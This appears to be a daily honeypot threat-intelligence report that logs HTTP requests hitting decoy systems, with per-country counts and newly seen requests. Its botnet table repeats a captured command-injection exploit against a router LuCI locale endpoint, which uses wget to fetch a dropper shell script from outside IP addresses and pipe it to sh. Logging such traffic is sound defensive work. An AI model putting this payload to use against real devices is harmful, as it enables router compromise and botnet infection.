Skip to main content
  1. Daily-Posts/

Report: 2025-08-26

·353 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-26
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 18 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 7 new requests that have never been observed before (these were added to the monitored request database.).

A total of 396 requests were recorded during the day, originating from 18 different countries, with a peak of 114 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
USGermany
BRGermany
SGGermany
USGermany

botnet_dropper_behaviour
#

remote_addrrequest
139.216.137.182GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
124.150.80.6GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
156.244.27.246GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
93.173.182.98GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
59.17.94.186GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1
193.82.251.80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
159.192.124.128GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//95.103.172.144/router.tplink.sh%20-O-%7Csh) HTTP/1.1
109.207.235.60GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
221.157.252.246GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//95.103.172.144/router.tplink.sh%20-O-%7Csh) HTTP/1.1
186.208.103.32GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//95.103.172.144/router.tplink.sh%20-O-%7Csh) HTTP/1.1
121.167.125.180GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
74.101.55.137GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
103.4.235.86GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
122.199.74.31GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
91.169.235.135GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
59.1.211.226GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
160.39.24.114GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
91.174.184.167GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
371GET /OdinHttpCall1756191837 HTTP/1.1
701GET /Odin/http/call1756191837 HTTP/1.1
711GET /odinhttpcall1756191837 HTTP/1.1
1151CONNECT 196.251.80.241:80 HTTP/1.0
1161\x04\x01\x00P\xC4\xFBP\xF1\x00
1271\x00\x0E8\xDF\xB9Cra\x99\x1B\x8B\x00\x00\x00\x00\x00
1351\x00\x0E8\xEC\x06\xAD\x88\xE8\x0F\x92\xBA\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0114US
164GB
253DE
347HK
421SC
513BG
611KR
711CN
86AU
96HU
105NL
115FR
125CA
134BR
144ZA
153JP
163TH
173SG
182IN
192PL
202ES
212RO
222IL
232RU
241AR
251BE
261BD
271MC
281CO
291IR

Related

Report: 2025-08-25
·314 words
Repport Daily
Report: 2025-08-24
·992 words
Repport Daily
Report: 2025-08-23
·474 words
Repport Daily